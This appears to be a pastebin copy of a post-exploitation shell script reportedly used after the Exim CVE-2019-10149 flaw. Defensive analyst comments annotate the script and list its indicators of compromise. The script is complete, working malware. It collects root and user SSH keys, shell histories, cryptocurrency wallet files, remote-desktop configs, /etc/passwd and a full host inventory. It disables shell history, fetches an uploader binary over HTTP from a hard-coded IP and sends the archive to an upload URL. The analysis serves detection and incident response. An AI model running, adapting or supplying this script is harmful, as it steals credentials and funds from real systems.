
Untitled

a guest Jun 16th, 2019 193 Never
#!/bin/sh

# found in the wild
# exim exploit 2019-10149
#
# Analyst annotation (defensive review, code left unchanged):
# This is a post-exploitation collector/exfiltration script; the author's
# own comment ties it to the 2019 Exim issue (CVE-2019-10149). It stages a
# copy of root's SSH/shell/wallet files and a host inventory in a scratch
# directory, packs it with tar+bzip2, downloads an uploader binary over
# plain HTTP and hands the archive to it. The comments below call out the
# host artifacts and network indicators that are visible in the script
# itself, so detections and an IR checklist can be built from them.
#
# Indicators present in this script:
#   - marker file  temp3754r97y2  in /var/tmp, /tmp or /dev/shm (empty, created by touch)
#   - staging dir  <scratch>/r/root and archive <scratch>/rf (bzip2 tar)
#   - binary named atd (610932 bytes) dropped in the scratch dir and run from there
#   - HTTP GET to 173.212.214.137 for /se (uploader) or /icantgetit (failure beacon)
#   - upload endpoint https://85.25.84.99/up.php passed to the uploader via UPLOAD_URL

# Fixed PATH and C locale; presumably so tool names resolve to system
# binaries regardless of what the exploited process inherited.
export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
export LC_ALL=C
# Shell history disabled for this session (anti-forensic; only matters for
# interactive shells, so mostly cosmetic for a non-interactive sh run).
export HISTFILE=/dev/null
export HISTSIZE=0

# HOME forced to /root: the `cd $HOME` steps below therefore read root's
# home, i.e. the author expects to be running as root.
HOME=/root
unset DISPLAY
# Network indicator: exfiltration target. The script itself never contacts
# it; the variable is inherited by the downloaded uploader (see snd).
export UPLOAD_URL=https://85.25.84.99/up.php

# Feature switches: NOLS=1 would skip directory listings, NOETC=1 would skip
# the /etc copy, NODUP=1 enables the "already ran here" check below.
NOLS=0
NOETC=0
NODUP=1
V=2
# Marker filename (temp3754r97y2 with V=2). Host indicator: an empty file of
# this name in any of the three scratch dirs. Nothing in this script deletes it.
UF=temp3754r97y$V

# Re-run guard: exit 100 if the marker already exists anywhere.
if [ $NODUP -eq 1 ]; then
    test -f /var/tmp/$UF -o -f /tmp/$UF -o -f /dev/shm/$UF && exit 100
fi
# Pick the first writable scratch location by creating the marker there;
# exit 90 if none of the three is writable.
BASE=''
touch /var/tmp/$UF && BASE=/var/tmp
test -z "$BASE" && touch /tmp/$UF && BASE=/tmp
test -z "$BASE" && touch /dev/shm/$UF && BASE=/dev/shm
test -z "$BASE" && exit 90
# Working directory becomes $BASE/r. Note there is no `set -e`: if `mkdir r`
# fails (directory already present) the script silently continues in $BASE.
cd $BASE && mkdir r && cd r
# Scratch dir is prepended to PATH so the uploader dropped there as `atd`
# is later found by bare name (see snd and the final line).
export PATH=$BASE:$PATH

# snd <file>: runs the downloaded uploader (named `atd`, the same name as
# the at daemon) in the background of a throwaway `sh -c`, passing the
# archive path, "<hostname>.tbz2" as the remote name and UPLOAD_URL through
# its environment. Detection angle: a process called atd whose executable
# lives under /var/tmp, /tmp or /dev/shm, with UPLOAD_* variables in its
# environment.
snd () { sh -c "UPLOAD_FILE=\"$1\" UPLOAD_NAME=\"$(hostname).tbz2\" UPLOAD_URL=$UPLOAD_URL atd &"; }

# ok, real work starts here
# Staging tree: $BASE/r/root/ holds everything that ends up in the archive.
main_dir=$BASE/r
mkdir $main_dir/root/

# Credential-bearing files from root's home: SSH keys/known_hosts, shell rc
# files, every *history file, .histfile (zsh), .profile and .dbshell (the
# MongoDB shell history, presumably). Errors are discarded.
COPY_STUFF=".ssh/ .bashrc .zshrc .*history .histfile .profile .dbshell"
cd $HOME && cp -a $COPY_STUFF $main_dir/root/ 2>/dev/null


# Second sweep into root.tar, for root and for every user under /home:
# cryptocurrency wallet files (w*dat in .*coin/.*Coin/.dash* dirs and their
# *.conf), *address.txt, VNC/redis/rdesktop/remmina configs, and the same
# SSH/shell/history files as above. The wallet/coin globs are the clearest
# statement of what this campaign is after.
cd $HOME && tar cf $main_dir/root/root.tar \
 .*coin/w*dat .*Coin/w*dat .dash*/w*dat .dash*/*.conf .*coin/*.conf .*Coin/*.conf *address.txt \
 *coin/w*dat *Coin/w*dat .vnc* .redis* .rdesk* .remmina \
 /home/*/.*coin/w*dat /home/*/.dash*/w*dat /home/*/.dash*/*conf /home/*/.*Coin/w*dat /home/*/.*coin/*.conf /home/*/.*Coin/*.conf \
 /home/*/.ssh /home/*/.remmina /home/*/.vnc* /home/*/.redis* /home/*/.rdesk* /home/*/.remmina \
 /home/*/.bash* /home/*/.zsh* /home/*/.*hist* /home/*/.profile /home/*/.dbshell 2>/dev/null
cd $main_dir/root/

# Installed ssh version (ssh -V prints to stderr, hence the redirect order
# only captures it when ssh writes to stdout; the result may be empty).
ssh -V > ssh.version 2>/dev/null

# Directory listings of /home and /root. `la` is not a standard command,
# so on most hosts the third line fails silently and `rootls` is left empty.
if [ $NOLS -eq 0 ]; then
    ls -la /home/ > homes 2>/dev/null
    ls -la /home/*/ >> homes 2>/dev/null
    la -laR /root > rootls 2>/dev/null
fi

# Host inventory goes into root/sysinfo/.
mkdir $main_dir/root/sysinfo 2>/dev/null
cd    $main_dir/root/sysinfo 2>/dev/null

# EXIM
# Distro/release strings, addresses and the live firewall rule set.
tail -n 100 /etc/*release /etc/version > system.version  2>/dev/null
ip addr > ip  2>/dev/null
iptables-save  > iptables  2>/dev/null
ip6tables-save > ip6tables 2>/dev/null
# /EXIM end exim

hostname > hostname
uname -a > uname
# Writes the UTC date and, in parentheses, the output of executing the path
# returned by `which date` (i.e. the local-time date).
echo `date -u` '('`$(which date)`')' > date
uptime > uptime
w > w
id > id

# Process table three ways: with threads, as a tree, and with environments.
ps auxwwwwwTH > ps
ps auxwwwwwf  > ps-forest
ps auxwwwwwfe > ps-env

cat /proc/meminfo > meminfo 2>/dev/null
cat /proc/cpuinfo > cpuinfo 2>/dev/null
ifconfig -a > ifconfig 2>/dev/null
df > df 2>/dev/null
dmesg > dmesg 2>/dev/null
mount > mount 2>/dev/null
# Note: this dump includes UPLOAD_URL and the modified PATH from above.
env > env 2>/dev/null

lspci -k > lspci 2>/dev/null
lsusb > lsusb 2>/dev/null

# Sockets with owning processes, and the routing table.
netstat -antpuxwenW > netstat 2>/dev/null
route -en > route 2>/dev/null

# other kernel info
cat /proc/modules > lsmod 2>/dev/null
cp /proc/version /proc/cmdline /proc/filesystems . 2>/dev/null
lscpu > lscpu 2>/dev/null

# copy stuff from /etc?
# Copies release/version/issue/hosts/motd, all cron* entries, /etc/passwd,
# the apache2/httpd/nginx config trees, resolv* and wpa* (wireless config).
# -L follows symlinks so linked config is copied as real files.
if [ $NOETC -eq 0 ]; then
    mkdir $main_dir/root/sysinfo/etc
    cd    $main_dir/root/sysinfo/etc
    cp -pRL /etc/*release /etc/cron* /etc/*version /etc/issue* /etc/hosts* /etc/motd /etc/passwd /etc/apache2 /etc/httpd /etc/nginx /etc/resolv* /etc/wpa* . 2>/dev/null
    cd -
fi

cd $main_dir/root

# list some dirs
# Recursive listings of /boot and /etc (stderr included this time).
if [ $NOLS -eq 0 ]; then
    ls -laR /boot > ls-boot 2>&1
    ls -laR /etc  > ls-etc  2>&1
fi

# compress n clean up
# Host artifact: bzip2 tarball at $BASE/rf containing the root/ tree
# (bulky httpd modules/lib/man dirs excluded to keep the upload small).
cd $main_dir
tar -cj --exclude 'root/sysinfo/etc/httpd/modules*' --exclude 'root/sysinfo/etc/httpd/lib*' --exclude 'root/sysinfo/etc/httpd/man*' -f $BASE/rf root

# drop source files
# Only the staging tree is removed (in the background). The archive `rf`,
# the `atd` binary and the marker file are not deleted by this script, so
# they may still be on disk during IR.
rm -rf $main_dir &

# ready to send!
cd $BASE
# Network indicator: unencrypted HTTP download of the uploader from
# 173.212.214.137/se into ./atd; if that fails, a second GET to
# /icantgetit (discarded) acts as a failure beacon to the same host.
wget -q http://173.212.214.137/se -O atd || wget -q http://173.212.214.137/icantgetit -O /dev/null
# The uploader is only executed if it is exactly 610932 bytes — an
# integrity check for the author, and a fixed size to hunt for on disk.
test `stat -c %s atd` -eq 610932 && chmod +x atd && snd rf